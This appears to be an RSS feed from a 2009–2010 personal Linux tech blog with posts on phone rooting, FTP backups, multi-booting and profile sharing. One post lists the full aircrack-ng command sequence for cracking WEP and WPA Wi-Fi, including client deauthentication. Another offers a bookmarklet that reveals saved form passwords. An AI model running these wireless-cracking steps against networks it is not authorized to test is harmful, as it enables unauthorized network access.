<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HydTech &#187; opensuse</title>
	<atom:link href="http://hydtechblog.com/category/opensuse/feed/" rel="self" type="application/rss+xml" />
	<link>http://hydtechblog.com</link>
	<description>anotha hyd anotha day</description>
	<lastBuildDate>Sat, 24 Jul 2010 14:33:39 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Getting root on your new Nexus One Android Google Phone</title>
		<link>http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/</link>
		<comments>http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/#comments</comments>
		<pubDate>Tue, 05 Jan 2010 23:29:09 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Android]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[OSX]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=638</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/&amp;title='Getting+root+on+your+new+Nexus+One+Android+Google+Phone'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>The Nexus one was rooted before it even got released.  Paul at modaco forums showed us how to perform this hack.  I&#8217;ll try to simplify the method here.</p>
<p>1. First unlock your bootloader if you have a T-mobile Nexus One (this voids the warranty) or get an unlocked version from Google for like $550:</p>
<p>a. <a href="http://hydtechblog.com/filez/fastboot.zip">download fastboot</a><br />
b. open terminal or command line and type<br />
 &#8211; Windows <code>fastboot-windows oem unlock</code><br />
 &#8211; Mac <code>./fastboot-mac oem unlock</code><br />
 &#8211; Linux <code>./fastboot-linux oem unlock</code></p>
<p>2. Rewrite the Bootloader to obtain root privileges:</p>
<p>a. Download either <a href="http://hydtechblog.com/filez/1.1-nexusone-superboot.zip">SuperBoot</a> or  <a href="http://hydtechblog.com/filez/1.1-nexusone-insecure.zip">InsecureBoot</a> and extract. (The difference is that with the insecure boot you won&#8217;t make any changes to the system and you would have to launch su manually)<br />
b. Put the device in bootloader mode:<br />
 &#8211; Turn off the phone and restart holding the trackball.<br />
c. Flash the bootloader:<br />
 &#8211; Windows = double click the windows bat file<br />
 &#8211; Mac = open terminal and cd to the directory containing the file.  type <br /><code>chmod +x install-superboot-mac.sh<br />
./install-superboot-mac.sh</code><br />
 &#8211; Linux = open terminal and cd to the directory containing the file.  type <br /><code>chmod +x install-superboot-linux.sh<br />
./install-superboot-linux.sh</code></p>
<p>Now you should have root!</p>
<p><img src="http://content.modaco.net/imagewell/rootednexusone.jpg" alt="Rooted Nexus One Google Phone" /><br />
Pic courtesy of Stericson.</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=638&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2010/01/05/getting-root-on-your-new-nexus-one-android-google-phone/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Automatic website backup without SSH enabled over FTP</title>
		<link>http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/</link>
		<comments>http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/#comments</comments>
		<pubDate>Thu, 03 Dec 2009 22:34:42 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Lenovo S10]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[OSX]]></category>
		<category><![CDATA[Webhosting]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=597</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/&amp;title='Automatic+website+backup+without+SSH+enabled+over+FTP'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>Last time I backed up my website with rsync and ssh, but on my new host they disabled SSH.  Rsync does not work over ftp.  I do not want to do incremental backups with delta files like is done with rdiff-backup or duplicity. I need to have an exact mirror of my site.  But remember that your sql databases won&#8217;t be backed up.</p>
<p>Curlftpfs is the key! In this tutorial I will show you how to backup from one server to a backup location which can be your hard drive, another web host, dropbox folder, Box.net via webdav, etc.</p>
<p>Download curlftpfs, rsync and ncftp:<br />
<code>sudo apt-get install curlftpfs ncftp rsync</code></p>
<p>make directories to mount your ftp server:<br />
<code>sudo mkdir /media/hydtechblog</code><br />
<code>sudo mkdir /media/hydtechbackupserver</code></p>
<p>edit fstab to mount the ftp servers using curlftpfs:<br />
<code>sudo gedit /etc/fstab</code></p>
<p>add the lines and modify them according to your server:<br />
curlftpfs#username:password@hydtechblog.com /media/hydtechblog fuse rw,allow_other,uid=root 0 0<br />
curlftpfs#username:password@hydtechbackupserver /media/hydtechbackupserver fuse rw,allow_other,uid=root 0 0</p>
<p>One thing to remember is that these two will not mount automatically because when the computer restarts, the fstab is done while you are not connected to the network.  To fix this we can just add the mount commands in our crontab.</p>
<p>Edit crontab:<br />
<code>sudo crontab -e</code><br />
enter the following lines and modify accordingly:<br />
00 09 * * * mount /media/hydtechblog<br />
00 09 * * * mount /media/hydtechbackup<br />
01 09 * * * rsync -avz &#8211;rsync-path=/usr/bin/rsync /media/hydtechblog/public_html /media/hydtechbackup/public_html</p>
<p>ctrl + o to write and ctrl + x to save</p>
<p>This will tell cron to mount the folders at 9:00 am and start rsync at 9:01 am.  You can replace the backup location to another folder on your hard drive or your dropbox or ubuntu one folder.  You can also mount box.net with webdav and use this method.</p>
<p>For encrypted incremental backups checkout duplicity, it also works with webdav and ftp.</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=597&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/12/03/automatic-website-backup-without-ssh-enabled/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Revealing Opera wand passwords on Ubuntu Linux and OS X</title>
		<link>http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/</link>
		<comments>http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/#comments</comments>
		<pubDate>Mon, 23 Nov 2009 20:28:09 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=586</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/&amp;title='Revealing+Opera+wand+passwords+on+Ubuntu+Linux+and+OS+X'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>There are several utilities in Windows which reveal the opera wand password and I haven&#8217;t used windows in forever.  The Opera wiki has a Power button which can help capture your password while logging in to the site. <a class="button" title="Click this link in Opera" href="opera:/button/Wand &amp; Go to page, &quot;javascript:(function(){var s,F,j,f,i; s=%27%27; F=document.forms; for(j=0; j&lt;F.length; ++j){f=F[j]; for(i=0; i&lt;f.length; ++i){if(f[i].type &amp;&amp; f[i].type.toLowerCase()==%27password%27)s+=f[i].value+%27%5cn%27;}}if(s)alert(%27Passwords in forms on this page:%5cn%5cn%27+s);else alert(%27There are no passwords in forms on this page.%27);})();&quot;,1,,&quot;Wand&quot;">Click this link in Opera</a> and it will install a button which you can drag to any panel.  While on a page which requires a password, you can click on this new wand instead of your original wand.</p>
<p>Voila!</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=586&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/11/23/revealing-opera-wand-passwords-on-ubuntu-linux-and-os-x/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cracking WEP &amp; WPA with IBM Lenovo X60 &#8211; Basics</title>
		<link>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/</link>
		<comments>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 05:43:21 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[lenovo]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[wpa]]></category>
		<category><![CDATA[x60]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=460</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/&amp;title='Cracking+WEP+%26amp%3B+WPA+with+IBM+Lenovo+X60+-+Basics'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>At first injection with the Intel pro wireless cards was impossible.  Then came the ipwraw driver.  Now, we no longer need the ipwraw as the iwl3945 card supports injection<a href="http://hydtechblog.com">.</a>  Most linux distros now ship with this driver.</p>
<p>Follow these steps for a succesful WEP crack in Ubuntu:</p>
<p>download necessary files<br />
sudo apt-get install aircrack-ng</p>
<p>place card in monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>test injection<br />
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80  mon0<br />
(0% means injection not working)</p>
<p>capture data and write to file called output<br />
 sudo airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w output mon0</p>
<p>fake authentication<br />
 sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>replay mode<br />
 sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>run aircrack<br />
sudo  aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap</p>
<p>For WPA cracking follow this:</p>
<p>monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>collect handshake<br />
sudo  airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w psk mon0</p>
<p>deauth connected client<br />
sudo  aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0</p>
<p>cracking<br />
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap</p>
<p>These are just refreshers. For more help check www.aircrack-ng.org</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=460&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Freenx nx server problem in Ubuntu Jaunty 9.04</title>
		<link>http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/</link>
		<comments>http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/#comments</comments>
		<pubDate>Wed, 01 Jul 2009 20:52:27 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=385</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/&amp;title='Freenx+nx+server+problem+in+Ubuntu+Jaunty+9.04'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>After upgrading to Jaunty, I never managed to successfully connect to my desktop using NX.  I use a windows computer with nomachine nx client. I always got an error like this:<br />
<code><br />
Info: Proxy running in client mode with pid '1728'<br />
Session: Starting session at 'Sat Jan 12 16:34:05 2008'.<br />
Warning: Connected to remote version 3.0.0 with local version 3.1.0<br />
Info: Connection with remote proxy completed.<br />
Warning: Unrecognized session type 'unix-desktop'. Assuming agent session.<br />
Info: Using ADSL link parameters 512/24/1/0.<br />
Info: Using cache parameters 4/4096KB/16384KB/16384KB.<br />
Info: Using pack method 'adaptive-7' with session 'unix-gnome'.<br />
Info: Using ZLIB data compression 1/1/32.<br />
Info: Using ZLIB stream compression 4/4.<br />
Info: No suitable cache file found.<br />
Info: Forwarding X11 connections to display ':0'.<br />
Info: Forwarding multimedia connections to port '6000'.<br />
Info: Listening to font server connections on port '11000'.<br />
Session: Session started at 'Sat Jan 12 16:58:19 2008'.<br />
Info: Established X server connection.<br />
Info: Using shared memory parameters 0/0K.<br />
Session: Terminating session at 'Sat Jan 12 16:58:19 2008'.<br />
Session: Session terminated at 'Sat Jan 12 16:58:19 2008'.</code></p>
<p>After hours of searching the web, I concluded the problem is with the ownership and permissions of the .Xauthority file.  Here&#8217;s how I fixed it:<br />
<code>sudo chown hydtech /home/hydtech/.Xauthority<br />
sudo chgrp hydtech /home/hydtech/.Xauthority</code></p>
<p>and delete:<br />
<code>sudo rm /home/hydtech/.Xauthority-l<br />
sudo rm /home/hydtech/.Xauthority-c</code></p>
<p>Now it works like a c<a href="http://hydtechblog.com">h</a>arm.</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=385&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/07/01/freenx-nx-server-problem-in-ubuntu-jaunty-9-04/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>How to install Opera and Thunderbird and share the profiles between Windows, Ubuntu, Fedora and openSuse</title>
		<link>http://hydtechblog.com/2009/03/26/how-to-install-opera-and-thunderbird-and-share-the-profiles-between-windows-ubuntu-fedora-and-opensuse/</link>
		<comments>http://hydtechblog.com/2009/03/26/how-to-install-opera-and-thunderbird-and-share-the-profiles-between-windows-ubuntu-fedora-and-opensuse/#comments</comments>
		<pubDate>Thu, 26 Mar 2009 23:19:00 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[gnome]]></category>
		<category><![CDATA[kde]]></category>
		<category><![CDATA[mount]]></category>
		<category><![CDATA[ntfs-3g]]></category>
		<category><![CDATA[opera]]></category>
		<category><![CDATA[partition]]></category>
		<category><![CDATA[profiles]]></category>
		<category><![CDATA[settings]]></category>
		<category><![CDATA[thunderbird]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=289</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/03/26/how-to-install-opera-and-thunderbird-and-share-the-profiles-between-windows-ubuntu-fedora-and-opensuse/&amp;title='How+to+install+Opera+and+Thunderbird+and+share+the+profiles+between+Windows%2C+Ubuntu%2C+Fedora+and+openSuse'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/03/26/how-to-install-opera-and-thunderbird-and-share-the-profiles-between-windows-ubuntu-fedora-and-opensuse/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>Mozilla thunderbird saves the settings in a file called profile.ini.  This file contains the location of the folder which has all your mail and settings.  When first installed and loaded, thunderbird creates a random folder like diy1bg1t.default.</p>
<p>Opera settings are stored in Opera6.ini.  This has information for the location of other settings files, like wand passwords, plugin locations<a href="http://www.hydtechblog.com">,</a> etc.</p>
<p>I installed these programs on Windows first and kept the default settings and locations for these files.  After installing Ubuntu, I had to figure out a way to share the profiles, but back then people were suggesting to make a common FAT32 partition and keep these files there so Linux could have read and write access to them.  With NTFS-3G, this became much easier and I just left the files on the NTFS partition.  Later on I installed Fedora and openSuse on the same machine and used the same directions like Ubuntu. (<a href="http://hydtechblog.com/2009/03/26/lenovo-thinkpad-x60-with-fedora-10-opensuse-11-ubuntu-904-and-windows-xp/">Check here to see my post about Quad Booting my Thinkpad with Windows, Ubuntu, Fedora, and openSuse</a>)</p>
<p>The first step was to make sure the NTFS partition was mounted at start up.  I made a folder for the mount:</p>
<p><code>sudo mkdir /media/sda1</code></p>
<p>On startup, the system looks for partitions to mount in fstab.  If you need more information on mounting and fstab, I recommend this post at <a href="http://ubuntuforums.org/showthread.php?t=283131">ubuntuforums.org </a></p>
<p>opened fstab for editing:</p>
<p><code>sudo gedit /etc/fstab</code></p>
<p>added the following entry to fstab because my Windows partition is at /dev/sda1:</p>
<p><code># My windows partition<br />
/dev/sda1    /media/sda1   ntfs-3g   defaults, locale=en_US.UTF-8   0    0 </code></p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/fstabfedora.png" alt="fstabfedora" title="fstabfedora" width="510" height="382" class="aligncenter size-full wp-image-300" /><br />
Save file, restart.</p>
<p>Once Linux loaded back up and the Windows partition was automatically mounted, I got the packages for Opera and thunderbird and installed them with this:</p>
<p>In Ubuntu:<br />
<code>sudo apt-get install opera    mozilla-thunderbird</code></p>
<p>Thunderbird In Fedora:<br />
<code>su<br />
(enter password)<br />
yum install thunderbird</code></p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/installthunderbirdfedora.png" alt="installthunderbirdfedora" title="installthunderbirdfedora" width="510" height="382" class="aligncenter size-full wp-image-296" /><br />
Thunderbird in openSuse:<br />
used the yast2 graphical package manager.</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/packagemanageropensuse.png" alt="packagemanageropensuse" title="packagemanageropensuse" width="510" height="382" class="aligncenter size-full wp-image-305" /></p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/installthunderbirdsuse.png" alt="installthunderbirdsuse" title="installthunderbirdsuse" width="510" height="382" class="aligncenter size-full wp-image-306" /></p>
<p>Opera in Fedora and openSuse:<br />
downloaded rpm package from www.opera.com onto desktop</p>
<p><code>rpm -ivh /home/(user)/Desktop/opera-9.64.gcc4-shared-qt3.i386.rpm</code></p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/installoperafedora.png" alt="installoperafedora" title="installoperafedora" width="510" height="382" class="aligncenter size-full wp-image-297" /></p>
<p>The mozilla profile.ini file will be under<br />
/home/(user)/.mozilla-thunderbird      for Ubuntu<br />
/home/(user)/.thundebird                 for openSuse and Fedora</p>
<p>The folders that start with a dot are hidden and you can unhide them in Nautilus (Gnome) with &#8220;Alt+H&#8221; and in Dolphin (KDE) with &#8220;Alt+.&#8221;</p>
<p>The profile.ini in Linux should be something like this pointing to the folder which has your mail:</p>
<p><code>[General]<br />
StartWithLastProfile=1</p>
<p>[Profile0]<br />
Name=default<br />
IsRelative=0<br />
Path=/media/sda1/Documents and Settings/(windows user)/Application Data/Thunderbird/Profiles/diy1bg1t.default</code></p>
<p>Make sure that isRelative=0 and replace the diy1bg1t with the appropriate foldername</p>
<p>Now when I opened up Thunderbird, I had my mail !!!!</p>
<p>Moving on to Opera:</p>
<p>After Opera was installed in Linux, I copied the opera6.ini from windows to the opera folder in Linux located at /home/(user)/.opera</p>
<p>opened up the new opera6.ini for editing:</p>
<p><code>sudo gedit /home/(user)/.opera/opera6.ini</code></p>
<p>and replaced all the paths C:\Program Files\Opera 9\profile with /media/sda1/Program Files/Opera 9/profile</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/opera6.png" alt="opera6" title="opera6" width="510" height="382" class="aligncenter size-full wp-image-298" /></p>
<p>and deleted the session folder in /.opera and created a symbolic link to point to the session folder in windows.</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/sessions.png" alt="sessions" title="sessions" width="510" height="382" class="aligncenter size-full wp-image-299" /></p>
<p>Opened up Opera and was happy to discover all my tabs and settings!!</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=289&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/03/26/how-to-install-opera-and-thunderbird-and-share-the-profiles-between-windows-ubuntu-fedora-and-opensuse/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Lenovo Thinkpad X60 with Fedora 10, openSuse 11, Ubuntu 9.04 and Windows XP</title>
		<link>http://hydtechblog.com/2009/03/26/lenovo-thinkpad-x60-with-fedora-10-opensuse-11-ubuntu-904-and-windows-xp/</link>
		<comments>http://hydtechblog.com/2009/03/26/lenovo-thinkpad-x60-with-fedora-10-opensuse-11-ubuntu-904-and-windows-xp/#comments</comments>
		<pubDate>Thu, 26 Mar 2009 21:28:38 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[apt-get]]></category>
		<category><![CDATA[gnome]]></category>
		<category><![CDATA[kde]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[ntfs-3g]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[windows xp]]></category>
		<category><![CDATA[yast2]]></category>
		<category><![CDATA[yum]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=284</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/03/26/lenovo-thinkpad-x60-with-fedora-10-opensuse-11-ubuntu-904-and-windows-xp/&amp;title='Lenovo+Thinkpad+X60+with+Fedora+10%2C+openSuse+11%2C+Ubuntu+9.04+and+Windows+XP'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/03/26/lenovo-thinkpad-x60-with-fedora-10-opensuse-11-ubuntu-904-and-windows-xp/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>I&#8217;ve been using Ubuntu dual booted with windows for quite a while now, but due to driver compatibility issues and lack of knowledge used windows for the most part.  Since Ubuntu 8.10, I&#8217;ve completely switched over to Ubuntu and love it.  Mostly because it&#8217;s FREE!  Windows is still hanging around in case I might need it for some program in the future.  I use Thunderbird as my email client and Opera as my web browser.  One of my main concerns was sharing the profiles for these programs, but NTFS-3G has made life easier.</p>
<p>After feeling comfortable with Ubuntu, I decided I needed to expand my knowledge by learning to use KDE; different package managers like yum and yast; and the possibility of having multiple Linux Oses on single partitions.  After doing some research, I decided I should either go with openSuse or Fedora.  Then, I figured: &#8220;Why not both?&#8221; and leave Ubuntu and Windows intact.  I downloaded the Live CD&#8217;s for both Oses.  The Live CD installation has less programs and tools installed compared to the DVD installation.</p>
<p>I opened Gparted on Ubuntu to make extra partitions for Fedora and openSuse, but I realized I can&#8217;t have more than 4 primary partitions without hacking the MBR.  I deleted the Linux Swap partition because I already have 2GB of RAM.  I resized my Windows and Storage partitions and made one extra partition on which I would install both Fedora and openSuse.  I split the partition into 2 logical partitions of about 5GB each.</p>
<p><img class="aligncenter size-full wp-image-308" title="gparted" src="http://hydtech.files.wordpress.com/2009/03/gparted.png" alt="gparted" width="510" height="382" /></p>
<p>Since my Lenovo does not have an optical drive, I had to use an external USB drive and allow the BIOS to boot from it</p>
<p>Popped in the Fedora Live CD and installed Fedora.  I selected the first logical partition and set this location as &#8220;/&#8221; (root) and opted not to use a swap space.  When it asks to install GRUB, you can choose not to or to install it at the beginning of the Root partition and not at the beginning of the whole hard drive because Ubuntu has already installed GRUB there and you might not want to write over it.  I chose not to install GRUB.  It was a painless install.  Restarted and booted into Fedora to make sure it worked.</p>
<p>Next, I popped in the openSuse Live CD and installed it to the second logical partition also without swap space.  Again, chose not to install GRUB.  Install was again pretty simple.  Booted into openSuse to make sure it worked.</p>
<p>Now, I had to update my GRUB to include the other Oses.  I could have done it manually, but I chose to upgrade my 8.10 Intrepid to 9.04 Jaunty by hitting &#8220;Alt+F2&#8243; and typing &#8220;upgrade-manager -d&#8221;, which updated the entries in GRUB automatically.</p>
<p><img class="aligncenter size-full wp-image-309" title="updatemanager" src="http://hydtech.files.wordpress.com/2009/03/updatemanager.png" alt="updatemanager" width="510" height="382" /></p>
<p>.</p>
<p>.</p>
<p>.</p>
<p><a href="http://hydtechblog.com/2009/03/26/how-to-install-opera-and-thunderbird-and-share-the-profiles-between-windows-ubuntu-fedora-and-opensuse/"><span style="color:#ff0000;">Still one more issue: How to install Opera and Thunderbird and share the profiles between Windows, Ubuntu, Fedora and openSuse.  This call for a new blog entry.</span></a></p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<p>.</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=284&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/03/26/lenovo-thinkpad-x60-with-fedora-10-opensuse-11-ubuntu-904-and-windows-xp/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>How To save documents from Scribd when disabled by user with Ubuntu Intrepid or Jaunty</title>
		<link>http://hydtechblog.com/2009/03/17/scribd/</link>
		<comments>http://hydtechblog.com/2009/03/17/scribd/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 06:59:13 +0000</pubDate>
